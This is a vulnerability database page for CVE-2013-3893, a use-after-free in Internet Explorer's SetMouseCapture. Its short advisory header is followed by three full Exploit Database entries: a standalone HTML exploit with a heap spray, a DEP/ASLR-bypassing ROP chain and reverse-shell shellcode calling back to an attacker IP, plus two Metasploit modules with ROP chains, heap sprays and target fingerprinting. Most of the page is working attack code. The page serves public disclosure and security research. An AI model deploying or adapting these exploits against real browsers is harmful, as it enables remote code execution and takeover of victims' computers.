CVE-2013-3893 : Detail

CVE-2013-3893

79.81%V4
Network
2013-09-18
08h00 +00:00
2021-05-17
14h06 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 49872

Publication date : 2021-05-16 22h00 +00:00
Author : SlidingWindow
EDB Verified : No

# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json # Exploit Author: SlidingWindow # Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN # Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1) # Bypasses: DEP, ASLR using MSVCR71.DLL # Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training <html> <script> var spraychunks = new Array(); // Use BSTR spray since DEPS spray didn't work here function heapspray() { var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain. ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //Some padding ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565"); //ESP will point to 0x0c0c122c after stack-heap flip. ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //More padding for ADD ESP, 100 ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565"); //rop chain generated with mona.py - www.corelan.be //ropchain needed a little fix ropchain += unescape( "" + // #[---INFO:gadgets_to_set_ebp:---] : "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ebx:---] : "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201 "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] "%uffff%uffff" + // 0xffffffff : ,# "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edx:---] : "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ecx:---] : "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edi:---] : "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_esi:---] : "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] // "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "" + // #[---INFO:pushad:---] : "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "" + // #[---INFO:extras:---] : "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); var junk = unescape("%u2020%u2020"); while (junk.length < 0x4000) junk += junk; offset = 0x204/2 ; //0c0c1228 var junk_front = junk.substring(0,offset); var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length) var smallblock = junk_front + ropchain + shellcode + junk_end; var largeblock = ""; while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; } // make allocations for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2); } } function alloc(nr_alloc){ for (var i=0; i < nr_alloc; i++){ divobj = document.createElement('div'); // Allocate 0x25 (37 decimal) bytes. Vulnerable object size = 0x4c bytes divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" + "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858"; } } heapspray(); function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); heapspray(); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { //Vulnerable Object is freed here document.write(""); //Replace/Reclaim the freed object here. //Object size is 0x4c alloc(0x20); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html> <!-- Debug: Taking a different code path for this exploit First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000 eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] ds:002b:40404040=???????? 0:005> u eip mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] 7467b68f 8b5070 mov edx,dword ptr [eax+70h] 7467b692 ffd2 call edx 7467b694 8b400c mov eax,dword ptr [eax+0Ch] 7467b697 c3 ret 7467b698 90 nop 7467b699 90 nop 7467b69a 90 nop 0:005> ub eip mshtml!CElement::SecurityContext+0x22: 7467b681 8b01 mov eax,dword ptr [ecx] 7467b683 8b5070 mov edx,dword ptr [eax+70h] 7467b686 ffe2 jmp edx 7467b688 90 nop 7467b689 90 nop 7467b68a 90 nop 7467b68b 90 nop 7467b68c 90 nop
Exploit Database EDB-ID : 28682

Publication date : 2013-10-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventuall this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild first spotted in Japan 'sinn3r' # Metasploit (thx binjo for the heads up!) ], 'References' => [ [ 'CVE', '2013-3893' ], [ 'OSVDB', '97380' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'PrependMigrate' => true, 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget' => 0)) end def is_win7_ie9?(agent) (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/) end def get_preq_html(cli, req) %Q| <html> <script> function getDLL() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { return "office2010"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { return "office2007"; } return "na"; } window.onload = function() { document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL(); } </script> </html> | end def junk return rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(rop_dll) code = payload.encoded rop = '' p = '' case rop_dll when :office2007 rop = [ junk, # Alignment 0x51c46f91, # POP EBP # RETN [hxds.dll] 0x51c46f91, # skip 4 bytes [hxds.dll] 0x51c35a4d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bfa98e, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN [hxds.dll] 0x51c55c45, # DEC EAX, RETN [hxds.dll] 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c4c17c, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN [hxds.dll] 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c05766, # POP EDI # RETN [hxds.dll] 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll] 0x51c2e77d, # POP ESI # RETN [hxds.dll] 0x51bfc840, # JMP [EAX] [hxds.dll] 0x51c05266, # POP EAX # RETN [hxds.dll] 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51bdf91f, # PUSHAD # RETN [hxds.dll] 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") when :office2010 rop = [ # 4 dword junks due to the add esp in stack pivot junk, junk, junk, junk, 0x51c41953, # POP EBP # RETN [hxds.dll] 0x51be3a03, # RETN (ROP NOP) [hxds.dll] 0x51c41953, # skip 4 bytes [hxds.dll] 0x51c4486d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bfa298, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51bd5382, # DEC EAX # RETN [hxds.dll] 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1f094, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf1ff0, # POP EDI # RETN [hxds.dll] 0x51bd5383, # RETN (ROP NOP) [hxds.dll] 0x51c07c8b, # POP ESI # RETN [hxds.dll] 0x51bfc7cb, # JMP [EAX] [hxds.dll] 0x51c44707, # POP EAX # RETN [hxds.dll] 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51c3604e, # PUSHAD # RETN [hxds.dll] 0x51c541ef, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") end p = rop + code p end def get_exploit_html(cli, req, rop_dll) gadgets = {} case rop_dll when :office2007 gadgets[:spray1] = 0x1af40020 # 0x31610020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x3160ff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1ce8 # xchg eax,esp # add byte [eax], al # pop esi # mov [edi+23c], ebp # mov [edi+238], ebp # mov [edi+234], ebp # pop ebp # pop ebx # ret gadgets[:pivot] = 0x51be4418 when :office2010 gadgets[:spray1] = 0x1a7f0020 # 0x30200020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x301fff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1a41 # xchg eax,esp # add eax,dword ptr [eax] # add esp,10 # mov eax,esi # pop esi # pop ebp # retn 4 gadgets[:pivot] = 0x51c00e64 end p1 = [ gadgets[:target], # Target address gadgets[:pivot] # stack pivot ].pack("V*") p1 << get_payload(rop_dll) p2 = [ gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax) ].pack("V*") js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack("V*")) js_p1 = Rex::Text.to_unescape(p1) js_p2 = Rex::Text.to_unescape(p2) %Q| <html> <script> #{js_property_spray} function loadOffice() { try{location.href='ms-help://'} catch(e){} } var a = new Array(); function spray() { var obj = ''; for (i=0; i<20; i++) { if (i==0) { obj += unescape("#{js_s1}"); } else { obj += "\\u4242\\u4242"; } } obj += "\\u5555"; for (i=0; i<10; i++) { var e = document.createElement("div"); e.className = obj; a.push(e); } var s1 = unescape("#{js_p1}"); sprayHeap({shellcode:s1, maxAllocs:0x300}); var s2 = unescape("#{js_p2}"); sprayHeap({shellcode:s2, maxAllocs:0x300}); } function hit() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); spray(); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } for (i=0; i<20; i++) { document.createElement("frame"); } window.onload = function() { loadOffice(); hit(); } </script> </html> | end def on_request_uri(cli, request) agent = request.headers['User-Agent'] unless is_win7_ie9?(agent) print_error("Not a suitable target: #{agent}") send_not_found(cli) end html = '' if request.uri =~ /\?dll=(\w+)$/ rop_dll = '' if $1 == 'office2007' print_status("Using Office 2007 ROP chain") rop_dll = :office2007 elsif $1 == 'office2010' print_status("Using Office 2010 ROP chain") rop_dll = :office2010 else print_error("Target does not have Office installed") send_not_found(cli) return end html = get_exploit_html(cli, request, rop_dll) else print_status("Checking target requirements...") html = get_preq_html(cli, request) end send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @exploit_page = "default.html" super end end =begin hxds.dll (Microsoft® Help Data Services Module) 2007 DLL info: ProductVersion: 2.05.50727.198 FileVersion: 2.05.50727.198 (QFE.050727-1900) 2010 DLL info: ProductVersion: 2.05.50727.4039 FileVersion: 2.05.50727.4039 (QFE.050727-4000) mshtml.dll ProductVersion: 9.00.8112.16446 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileDescription: Microsoft (R) HTML Viewer 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 66e13df7 8b0e mov ecx,dword ptr [esi] 66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13e01 ffd0 call eax =end
Exploit Database EDB-ID : 28974

Publication date : 2013-10-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to set up for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unslect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3897' ], [ 'OSVDB', '98207' ], [ 'MSB', 'MS13-080' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ], [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', {} ], [ 'IE 8 on Windows 7', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, # Jsunpack first received a sample to analyze on Sep 12 2013. # MSFT patched this on Oct 8th. 'DisclosureDate' => "Oct 08 2013", 'DefaultTarget' => 0)) end def get_check_html %Q|<html> <script> #{js_os_detect} function os() { var detect = window.os_detect.getVersion(); var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version; return os_string; } function dll() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "#{@js_office_2010_str}"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "#{@js_office_2007_str}"; } return "#{@js_default_str}"; } window.onload = function() { window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll(); } </script> </html> | end def junk rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(target_info) rop_payload = '' os = target_info[:os] dll_used = '' case target_info[:dll] when @js_office_2007_str dll_used = "Office 2007" pivot = [ 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4 junk, # ESI due to POPAD junk, # EBP due to POPAD junk, junk, # EBX due to POPAD junk, # EDX due to POPAD junk, # ECX due to POPAD 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction) 0x51bd81db, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) when @js_office_2010_str dll_used = "Office 2010" pivot = [ 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4 junk, junk, junk, junk, junk, 0x51BE7E9A, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot}) when @js_default_str if target_info[:os] =~ /windows xp/i # XP uses msvcrt.dll dll_used = "msvcrt" pivot = [ 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret ].pack("V*") rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) else # Assuming this is Win 7, and we'll use Java 6 ROP dll_used = "Java" pivot = [ 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn junk # Padding for the POP ECX ].pack("V*") rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) end end print_status("Target uses #{os} with #{dll_used} DLL") rop_payload end def get_sploit_html(target_info) os = target_info[:os] js_payload = '' if os =~ /Windows (7|XP) MSIE 8\.0/ js_payload = Rex::Text.to_unescape(get_payload(target_info)) else print_error("Target not supported by this attack.") return "" end %Q|<html> <head> <script> #{js_property_spray} sprayHeap({shellcode:unescape("#{js_payload}")}); var earth = document; var data = ""; for (i=0; i<17; i++) { if (i==7) { data += unescape("%u2020%u2030"); } else { data += "\\u4141\\u4141"; } } data += "\\u4141"; function butterfly() { for(i=0; i<20; i++) { var effect = earth.createElement("div"); effect.className = data; } } function kaiju() { var godzilla = earth.createElement("textarea"); var minilla = earth.createElement("pre"); earth.body.appendChild(godzilla); earth.body.appendChild(minilla); godzilla.appendChild(minilla); godzilla.onselect=function(e) { minilla.swapNode(earth.createElement("div")); } var battleStation = false; var war = new Array(); godzilla.onpropertychange=function(e) { if (battleStation == true) { for (i=0; i<50; i++) { war.push(earth.createElement("span")); } } earth.execCommand("Unselect"); if (battleStation == true) { for (i=0; i < war.length; i++) { war[i].className = data; } } else { battleStation = true; } } butterfly(); godzilla.select(); } </script> </head> <body onload='kaiju()'> </body> </html> | end def on_request_uri(cli, request) if request.uri =~ /search\?o=(.+)\&d=(.+)$/ target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } sploit = get_sploit_html(target_info) send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) return end html = get_check_html print_status("Checking out target...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @js_office_2007_str = Rex::Text.rand_text_alpha(4) @js_office_2010_str = Rex::Text.rand_text_alpha(5) @js_default_str = Rex::Text.rand_text_alpha(6) super end end =begin +hpa this for debugging or you might not see a crash at all :-) 0:005> r eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=???????? 0:005> u mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] 6d6dc125 8365e800 and dword ptr [ebp-18h],0 6d6dc129 8d4de8 lea ecx,[ebp-18h] 6d6dc12c 51 push ecx 6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170) 6d6dc132 53 push ebx 6d6dc133 bf02400080 mov edi,80004002h 6d6dc138 ff10 call dword ptr [eax] =end

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Internet_explorer >> Version 11

Microsoft>>Internet_explorer >> Version 11

References

http://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-000093.html
Tags : third-party-advisory, x_refsource_JVNDB
http://jvn.jp/en/jp/JVN27443259/index.html
Tags : third-party-advisory, x_refsource_JVN
http://www.securityfocus.com/bid/62453
Tags : vdb-entry, x_refsource_BID
http://www.us-cert.gov/ncas/alerts/TA13-288A
Tags : third-party-advisory, x_refsource_CERT